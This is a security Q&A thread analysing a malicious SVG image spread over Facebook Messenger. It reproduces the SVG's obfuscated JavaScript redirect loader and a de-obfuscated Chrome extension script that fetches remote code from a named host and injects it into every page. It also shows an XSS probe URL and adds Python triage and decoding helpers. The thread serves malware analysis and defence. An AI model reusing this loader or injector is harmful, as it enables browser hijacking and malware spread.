16

What is this file attempting to do?

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function jxnpgmlk(wvdxrc,lecho,jqgws){
      var uxheu = "aC3YP1J7t?2R.o_gN0/5Fevz:b9ilEnjxmXTLK6dr8GpASs4IyDZk=hUVHfOcBuM";
      var uahflv = ["jfTiENZCUKG=Dtxuh.Fvr_?0X9mlJa4sRHkbnY26P1Iyc\/OVM:dLg7oBpA8eSz53","M0:ARfNp1cv\/bosBHlYxn.8Ok9T7IJ6GeEi3y5tmVUgKzDhur4PLC?2a_=XFdZSj","aKEd.eMR1bZ8rzm4tfuhn0Pp3xHI9AXg?Dv_cUVy2FLTlYoSGk:BN5\/=JOij7s6C","Iu2b=zPK0\/7vrj1LEARtcnUkShmG3J_.DNo46fCHXBx?i8s:T5ZepYgadOylMFV9"];
      var gzzxb = "";
      var jfort = 0;
      while(uahflv[jfort]){
        jfort++;
      }
      var xlmjv = 0;
      while(wvdxrc[xlmjv]){
        var uxqpon = 0;
        var aljmjv = -1;
        while(uxheu[uxqpon]){
          if(uxheu[uxqpon] == wvdxrc[xlmjv]){
            aljmjv = uxqpon;
            break;
          }
          uxqpon++;
        }
        if(aljmjv >= 0){
          var sqakm = 0;
          var ehtbzd = -1;
          while(uahflv[xlmjv%jfort][sqakm]){
            if(uahflv[xlmjv%jfort][sqakm] == wvdxrc[xlmjv]){
              ehtbzd = sqakm;
              break;
            }
          sqakm++;
          }
          gzzxb += uxheu[ehtbzd];
        }else{
          gzzxb += wvdxrc[xlmjv];
        }
        xlmjv++;
      }
      var swidsm = "";
      for(yokncr=lecho;yokncr<gzzxb.length;yokncr++){
        swidsm += gzzxb[yokncr];
      }
      gzzxb = swidsm;
      return gzzxb;
    }
  var yaqjv = window;
  var cujnl = jxnpgmlk("OEoqu71jy",6,true);
  var gnqrek = jxnpgmlk("_9Npy9P5tSxq?Ca3tda0loX",15,false);
  var zvlgj = jxnpgmlk("66/X_X",2,true);
  yaqjv[cujnl][gnqrek][zvlgj] = jxnpgmlk("R./0UK3RFEzVP7yrSoDRy2TRUV6sUbTgy",2,true);
  ]]></script>
</svg>
Arminius
Jmanhouss
  • Saw an explanation here: http://www.bleepingcomputer.com/forums/t/632614/facebook-svg-file-transfering/ – Lauri Elias Nov 20 '16 at 22:34
  • I've read that already but I'm kinda confused. So its purpose is to forward itself to everyone on your contacts list? The person who originally opened this "photo.svg" file sent it to everyone on their Facebook Messenger. According to this post on Bleeping, it's not really "doing anything" aside from maybe trying to hijack HTTP variables, IP addresses? I'm no computer whizz here, just curious lol – Jmanhouss Nov 20 '16 at 22:40
  • Says here the site attempts to install virus-like extensions: http://daubao.com/canh-giac-voi-dang-virus-facebook-moi-spam-hinh-anh-co-chua-ma-doc-cho-ban-be/cong-nghe/550040.html – Lauri Elias Nov 20 '16 at 22:50
  • I guess a better question is, if someone opened this.. like I did, I executed it in a browser before opening it with Visual Studio Code, and it loads up to an image of a red circle.. which I see now.. "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> What type of action should I or others take to avoid infection? Simple scans? – Jmanhouss Nov 20 '16 at 22:55
  • Unfortunately, we are not a malware code review site. – schroeder Nov 21 '16 at 07:44

3 Answers

42

This file is part of a virus.

It's an SVG image file containing obfuscated JS code that redirects you to a malicious website. This website will attempt to install malware (a Chrome browser plugin) and forward the SVG file to your Facebook contacts. If you think you got infected, follow these instructions: Help! My home PC has been infected by a virus! What do I do now?

Quick Analysis

The attacker likely chose an SVG file because it's an innocent-looking image format and less suspicious than executables or HTML files (whose transfer is also prohibited by Facebook). But despite being graphics, SVGs can also contain active script code.

The file itself contains an obfuscated inline <script> segment consisting of two parts. The first part is the function jxnpgmlk() which acts as a decoder that unscrambles any strings that it gets as input. The exact algorithm doesn't really matter because we can simply apply the function on any scrambled strings. The second part is a very short payload. The few strings defined here can simply be unscrambled by using the decoding function, resulting in this:

var cujnl = "top";
var gnqrek = "location";
var zvlgj = "href";
window[cujnl][gnqrek][zvlgj] = "http://mourid.com/php/trust.php";

So essentially, all this code does is redirect you to http://mourid.com/php/trust.php.

From there, two more 302 redirects follow to http://kerman.pw/php/trust.php and http://kerman.pw/?fb_dsa. The final page fakes the look of a YouTube video page to deceive users into installing a supposedly "missing codec". You will instead be prompted to install this malicious Chrome extension called "One":

https://chrome.google.com/webstore/detail/one/olonepdliekllagcdgmlbihgcplinegj
Edit: Google finally removed the extension from the Chrome Web Store but there might still be other instances around.

I manually downloaded the extension file and had a quick look at the obfuscated source code. The extension manifest defines several background scripts that immediately get loaded once installed. This is the essential part of what I de-obfuscated:

this["fetch"]("http://cerawa.pw/manalovuci/kojakumoda.bg")["then"](function(kkuruv) {
    if (kkuruv["ok"]) {
        kkuruv["blob"]()["then"](function(yxbnjo) {
            var pklimw = this["URL"]["createObjectURL"](yxbnjo);
            var yxyiq = this["document"]["createElement"]("script");
            yxyiq["src"] = pklimw;
            this["document"]["head"]["appendChild"](yxyiq);
        });
    }
});

As you can see the extension downloads additional JS code from http://cerawa.pw/manalovuci/kojakumoda.bg. (Note that the page won't return anything if you don't send a Chrome user agent.) That response is turned into an object URL and attached to every document while browsing, effectively giving the attacker remote control over your browsing session.


It seems that the malware can be triggered by user interaction only, so if you didn't install the extension you are probably safe. But since the page can easily serve different malware to different user agents or different countries, it's not possible to be absolutely sure that you didn't get infected while visiting the site. If in doubt, it's time to nuke it from orbit.

Bonus: Funnily, that page is also vulnerable to XSS. But I guess they don't have a Bug Bounty Program in place... (http://kerman.pw/"><script>alert(1)</script>).

Arminius
  • Thank you for that explanation, I understand now. Like I've said before, my PC knowledge isn't very advanced but I'm always super curious about what things like this are scripted for. Thanks again. – Jmanhouss Nov 20 '16 at 23:34
  • This is very interesting... some knowledgeable people here. – Jmanhouss Nov 21 '16 at 00:20
  • 1
    Should that extension be reported? Google is generally pretty strict about allowing malware on their stores. – Xiong Chiamiov Nov 21 '16 at 04:11
  • @XiongChiamiov Yes, it should be reported. – Arminius Nov 21 '16 at 04:12
  • 3
    Interestingly, we can only expect more of these, as Chrome is now the most widely used browser on the Internet, having more market share than all other browsers *combined*. – phyrfox Nov 21 '16 at 04:15
  • 1
    +1 for the detailed info. One thing though: everything up to this point, including the extension, must operate within the confines of the browser's sandbox. I came here from a site that claims it can install ransomware. How does it do so with the sandbox constraints? There should be no automatable way to install software that runs outside of the sandbox, using the operating system's file APIs. Any idea how this last step is achieved? – Richard B Nov 22 '16 at 03:42
  • 1
    @RichardB That's indeed a little unclear. Facebook said in a statement: "In our investigation, we determined that these were not in fact installing Locky malware—rather, they were associated with Chrome extensions." It would likely need further user interaction to get the ransomware set up. – Arminius Nov 22 '16 at 04:02
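The answer above makes the point that an SVG is an XML document and can carry active script, which is why an image-sharing pipeline cannot treat it like a PNG. As an added example, not code from the question or from this answer, here is a small Python triage check that parses an SVG and flags every way it can run code (inline or external `<script>`, `on*` event-handler attributes, `javascript:` URIs in `href`, and `<foreignObject>`, which can embed HTML), and that pulls out the script body for analysis. The two sample documents are constructed for this example: the first is modelled on the file in the question with an event handler and a `javascript:` link added so each check fires, and its URL is a placeholder; the function names are my own.

```python
import xml.etree.ElementTree as ET

ACTIVE_KINDS = ("inline-script", "external-script", "event-handler",
                "javascript-uri", "foreign-object")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attribute names."""
    return name.rsplit("}", 1)[-1]


def triage_svg(svg_text):
    """Return a list of findings, one per place this SVG could execute code.

    Each finding is a dict with 'kind' (one of ACTIVE_KINDS), 'where'
    (element or element@attribute) and 'detail' (first 80 characters).
    An empty list means no active content was seen in the markup; it is one
    signal for an upload pipeline, not proof the file is harmless.
    """
    root = ET.fromstring(svg_text)
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            body = (el.text or "").strip()
            src = next((v for k, v in el.attrib.items() if _local(k) == "href"), None)
            if src is not None:
                findings.append({"kind": "external-script", "where": "script@href",
                                 "detail": src[:80]})
            if body:
                findings.append({"kind": "inline-script", "where": "script",
                                 "detail": body[:80]})
        elif tag == "foreignObject":
            findings.append({"kind": "foreign-object", "where": "foreignObject",
                             "detail": ""})
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):
                findings.append({"kind": "event-handler", "where": f"{tag}@{aname}",
                                 "detail": value[:80]})
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append({"kind": "javascript-uri", "where": f"{tag}@{aname}",
                                 "detail": value[:80]})
    return findings


def extract_scripts(svg_text):
    """Return the bodies of all inline <script> elements, ready for de-obfuscation."""
    root = ET.fromstring(svg_text)
    return [(el.text or "").strip() for el in root.iter()
            if _local(el.tag) == "script" and (el.text or "").strip()]


# Constructed sample modelled on the file in the question: a visible shape plus an
# inline <script>; an onclick attribute and a javascript: link were added so every
# check fires. The URL is a placeholder, not the one in the original file.
SUSPICIOUS_SVG = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle cx="250" cy="250" r="50" fill="red" onclick="alert(1)" />
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">link</text></a>
  <script type="text/javascript"><![CDATA[
    window["top"]["location"]["href"] = "http://redirect.example/placeholder";
  ]]></script>
</svg>
"""

# Constructed benign control: the same shape with no active content.
BENIGN_SVG = """<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
</svg>
"""


if __name__ == "__main__":
    for f in triage_svg(SUSPICIOUS_SVG):
        print(f"{f['kind']:15} {f['where']:18} {f['detail']}")
    print("benign findings:", triage_svg(BENIGN_SVG))
```

When the input comes from untrusted uploads, `defusedxml.ElementTree.fromstring` is a drop-in replacement for `ET.fromstring` that refuses entity-expansion and external-entity tricks. The check complements, rather than replaces, the usual hosting controls: serve user-supplied SVGs from a separate origin, or rasterize them, so that even a script that slips through cannot run in the site's own context.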
9

I got this "wonderful" thing too, and I played a bit with it. Turns out, it only activates when you are using Chrome, because it tries to install an extension called "One", which is the darn virus. If you open it with any other browser (Opera, Firefox, Edge, IE, Safari, etc.), you will get only a white page; nothing will happen.

I think that the main essence of the virus is the extension, because it then tries to steal your data from Facebook. When you open it in Chrome, it looks like this: Picture from Chrome

If you click "Add extension", you get infected and it redirects to Facebook. At this point, you should immediately close Chrome and uninstall it. Or you can open the extensions tab and delete the extension called "One", but I don't think that removes it completely.

After removing it, I suggest changing Facebook password and logging out from all the other instances. (Facebook offers an option to do so.)

3

The code tries to redirect your browser to another website. The URL is kind of encrypted in the string variables within the JavaScript code.

If you visit a website that embeds this SVG image, it will immediately redirect to the (probably malicious) website. In order to defend against JavaScript redirects, you can disable JavaScript in your browser.


/**
* @param {string} ar
* @param {number} opt_attributes
* @param {boolean} recurring (unused)
* @return {string}
*/
function theMethod(ar, opt_attributes, recurring) {
    /** @type {string} */
    var a = "aC3YP1J7t?2R.o_gN0/5Fevz:b9ilEnjxmXTLK6dr8GpASs4IyDZk=hUVHfOcBuM";
    /** @type {Array} */
    var encrypted = ["jfTiENZCUKG=Dtxuh.Fvr_?0X9mlJa4sRHkbnY26P1Iyc/OVM:dLg7oBpA8eSz53", "M0:ARfNp1cv/bosBHlYxn.8Ok9T7IJ6GeEi3y5tmVUgKzDhur4PLC?2a_=XFdZSj", "aKEd.eMR1bZ8rzm4tfuhn0Pp3xHI9AXg?Dv_cUVy2FLTlYoSGk:BN5/=JOij7s6C", "Iu2b=zPK0/7vrj1LEARtcnUkShmG3J_.DNo46fCHXBx?i8s:T5ZepYgadOylMFV9"];
    var s = "";
    var n = encrypted.length; // number of substitution tables (4)
    var i = 0;

    // loop over the first argument
    for (;ar[i];) {
        var mid = 0;
        var high = -1;
        // get the index of the current character in the variable "a"
        for (;a[mid];) {
            if (a[mid] == ar[i]) {
                /** @type {number} */
                high = mid;
                break;
            }
            mid++;
        }
        // if we found the character in the variable "a"
        if (high >= 0) {
            var j = 0;
            var x = -1;
            // look the character up in the table selected by the position (i mod 4)
            for (;encrypted[i % n][j];) {
                if (encrypted[i % n][j] == ar[i]) {
                    x = j;
                    break;
                }
                j++;
            }
            // append the character of "a" at that index to the solution
            s += a[x];
        } else {
            // append char to solution
            s += ar[i];
        }
        i++;
    }
    /** @type {string} */
    var u = "";
    /** @type {number} */
    var aNumber = opt_attributes;
    // drop the first opt_attributes characters (padding)
    for (;aNumber < s.length;aNumber++) {
        u += s[aNumber];
    }
    s = u;
    return s;
}
// the decoded strings (results shown in the comments)
var cujnl = theMethod("OEoqu71jy", 6, true); // top
var gnqrek = theMethod("_9Npy9P5tSxq?Ca3tda0loX", 15, false); // location
var zvlgj = theMethod("66/X_X", 2, true); // href
window[cujnl][gnqrek][zvlgj] = theMethod("R./0UK3RFEzVP7yrSoDRy2TRUV6sUbTgy", 2, true); // the malicious URL
Stefan Braun
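The decoder that the first answer describes and that this answer annotates, ported to Python as an added example (not code from the question or from either answer) so the substitution can be followed without loading the script in a browser. The alphabet, the four substitution tables and the four scrambled strings are copied from the file in the question (the JS writes "/" as "\/"); the function names are my own. Besides decoding the payload, the block checks the property the scheme relies on: each table is a permutation of the alphabet, so every lookup succeeds and the character position modulo 4 is the only thing that varies between lookups.

```python
# Alphabet and the four per-position substitution tables, copied from the SVG in
# the question.
ALPHABET = "aC3YP1J7t?2R.o_gN0/5Fevz:b9ilEnjxmXTLK6dr8GpASs4IyDZk=hUVHfOcBuM"
TABLES = [
    "jfTiENZCUKG=Dtxuh.Fvr_?0X9mlJa4sRHkbnY26P1Iyc/OVM:dLg7oBpA8eSz53",
    "M0:ARfNp1cv/bosBHlYxn.8Ok9T7IJ6GeEi3y5tmVUgKzDhur4PLC?2a_=XFdZSj",
    "aKEd.eMR1bZ8rzm4tfuhn0Pp3xHI9AXg?Dv_cUVy2FLTlYoSGk:BN5/=JOij7s6C",
    "Iu2b=zPK0/7vrj1LEARtcnUkShmG3J_.DNo46fCHXBx?i8s:T5ZepYgadOylMFV9",
]

# The four (scrambled string, characters to skip) pairs the payload passes to the
# decoder, in the order the script uses them; also copied from the file.
PAYLOAD_CALLS = [
    ("OEoqu71jy", 6),
    ("_9Npy9P5tSxq?Ca3tda0loX", 15),
    ("66/X_X", 2),
    ("R./0UK3RFEzVP7yrSoDRy2TRUV6sUbTgy", 2),
]


def decode(scrambled, skip):
    """Port of jxnpgmlk() / theMethod() from the page.

    For the character at position i: if it is in ALPHABET, find its index in
    TABLES[i % 4] and emit the ALPHABET character at that index; otherwise
    emit it unchanged. Finally drop the first `skip` characters, which are
    padding. (The third JS argument is never read, so it is not modelled.)
    """
    out = []
    for i, ch in enumerate(scrambled):
        if ch in ALPHABET:
            idx = TABLES[i % len(TABLES)].find(ch)
            # In the JS a miss would append the string "undefined" (a[-1]); it
            # cannot happen because every table is a permutation of ALPHABET.
            out.append(ALPHABET[idx] if idx >= 0 else ch)
        else:
            out.append(ch)
    return "".join(out[skip:])


def tables_are_permutations():
    """True when each table holds exactly the ALPHABET characters, once each."""
    return all(sorted(t) == sorted(ALPHABET) for t in TABLES)


def decode_payload():
    """Decode the four strings in the order the script uses them."""
    return [decode(s, skip) for s, skip in PAYLOAD_CALLS]


def deobfuscated_statement():
    """Render the single statement the payload executes, with strings decoded."""
    obj, prop, attr, value = decode_payload()
    return f'window["{obj}"]["{prop}"]["{attr}"] = "{value}";'


if __name__ == "__main__":
    print("tables are permutations:", tables_are_permutations())
    print(deobfuscated_statement())
```

Running it prints the de-obfuscated redirect statement that both answers arrive at. The same port works for any sample that reuses this decoder with different tables: replace `ALPHABET`, `TABLES` and `PAYLOAD_CALLS` with the values from the new file and the rest is unchanged.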